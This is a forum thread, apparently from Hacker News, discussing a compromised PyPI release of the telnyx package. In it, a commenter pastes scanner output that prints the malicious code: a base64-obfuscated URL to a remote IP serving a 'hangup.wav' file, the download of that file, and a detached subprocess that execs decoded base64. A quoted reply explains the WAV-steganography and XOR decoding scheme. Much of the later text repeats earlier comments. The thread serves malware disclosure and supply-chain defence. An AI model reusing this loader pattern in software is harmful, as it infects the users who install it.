They did not even try to hide the payload that much:
hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip --min-confidence high --exclude HX4000
warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request.
┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77
86:13
│
7783 │ except:
7784 │ pass
7785 │
7786 │ r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')})
│ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000
7787 │ with urllib.request.urlopen(r, timeout=15) as d:
7788 │ with open(t, "wb") as f:
7789 │ f.write(d.read())
│
= Confidence: High
Help: Data exfiltration is the unauthorized transfer of data from a computer.
warning[HX4010]: Execution of obfuscated code.
┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78
10:9
│
7807 │ if os.name == 'nt':
7808 │ return
7809 │ try:
7810 │ ╭ subprocess.Popen(
7811 │ │ [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"],
7812 │ │ stdout=subprocess.DEVNULL,
7813 │ │ stderr=subprocess.DEVNULL,
7814 │ │ start_new_session=True
7815 │ │ )
│ ╰─────────^ HX4010
7816 │ except:
7817 │ pass
7818 │
│
= Confidence: VeryHigh
Help: Obfuscated code exec can be used to bypass detection.
jbrowning 8 minutes ago [-]
> The payload isn't delivered as a raw binary or a Python file. It's disguised as a .wav audio file.
> The WAV file is a valid audio file. It passes MIME-type checks. But the audio frame data contains a base64-encoded payload. Decode the frames, take the first 8 bytes as the XOR key, XOR the rest, and you have your executable or Python script.
Talk about burying the lede.
ilaksh 2 minutes ago [-]
The way I use Telynx is via SIP which is an open protocol. No reason we should be relying on proprietary APIs for this stuff.
On GitHub see my fork runvnc/PySIP. Please let me know if you know if something better for python that is not copy left or rely on some copy left or big external dependency. I was using baresip but it was a pain to integrate and configure with python.
Anyway, after fixing a lot in the original PySIP my version works with Telynx. Not tested on other SIP providers.
viscousviolin 14 minutes ago [-]
Is there a notification channel you can subscribe to / look at if you want to stay up to date on compromised PyPI packages?
carlsborg 19 minutes ago [-]
Anthropic/OpenAI could own this space. They should offer a paid service that offers a mirror with LLM scanned and sandbox-evaluated package with their next gen models. Free for individuals, orgs can subscribe to it.
oblvious-earth 5 minutes ago [-]
OpenAI just acquired Astral who have an index service called pyx, so they would have a step up.
My understanding though is most corporations that take security seriously either build everything themselves in a sandbox, or use something like JFrog's Artifactory with various security checks, and don't let users directly connect to public indexes. So I'm not sure what the market is.
doc_ick 1 minutes ago [-]
There’s also virustotal, any.run, probably a few others outside of GitHub/gitlab scans
charcircuit 8 minutes ago [-]
2FA needs to be required for publishing packages. An attacker compromising someone's CI should not give them free reign to publish malicious packages at any time they want.
oncallthrow 7 minutes ago [-]
I think it's only a matter of time at this point before a devastating supply chain attack occurs.
Supply-chain security is such a dumpster fire, and threat actors are realising that they can use LLMs to organize such attacks.
dlcarrier 13 minutes ago [-]
At this point, I'm not updating anything using Python.
Not that I had the option anyway, because everything using Python breaks if you update it. You know they've given up on backward comparability and version control, when the solution is: run everything in a VM, with its own installation. Apparently it's also needed for security, but the VMs aren't really set up to be secure.
I don't get why everything math heavy uses it. I blame MATLAB for being so awful that it made Python look good.
It's not even the language itself, not that it doesn't have its own issues, or the inefficient way it's executed, but the ecosystem around it is so made out of technical debt.
slowmovintarget 18 minutes ago [-]
Telnyx provides voice capabilities for OpenClaw for those wondering.
Rendered at 19:17:35 GMT+0000 (Coordinated Universal Time) with Vercel.
> The WAV file is a valid audio file. It passes MIME-type checks. But the audio frame data contains a base64-encoded payload. Decode the frames, take the first 8 bytes as the XOR key, XOR the rest, and you have your executable or Python script.
Talk about burying the lede.
On GitHub see my fork runvnc/PySIP. Please let me know if you know if something better for python that is not copy left or rely on some copy left or big external dependency. I was using baresip but it was a pain to integrate and configure with python.
Anyway, after fixing a lot in the original PySIP my version works with Telynx. Not tested on other SIP providers.
My understanding though is most corporations that take security seriously either build everything themselves in a sandbox, or use something like JFrog's Artifactory with various security checks, and don't let users directly connect to public indexes. So I'm not sure what the market is.
Supply-chain security is such a dumpster fire, and threat actors are realising that they can use LLMs to organize such attacks.
Not that I had the option anyway, because everything using Python breaks if you update it. You know they've given up on backward comparability and version control, when the solution is: run everything in a VM, with its own installation. Apparently it's also needed for security, but the VMs aren't really set up to be secure.
I don't get why everything math heavy uses it. I blame MATLAB for being so awful that it made Python look good.
It's not even the language itself, not that it doesn't have its own issues, or the inefficient way it's executed, but the ecosystem around it is so made out of technical debt.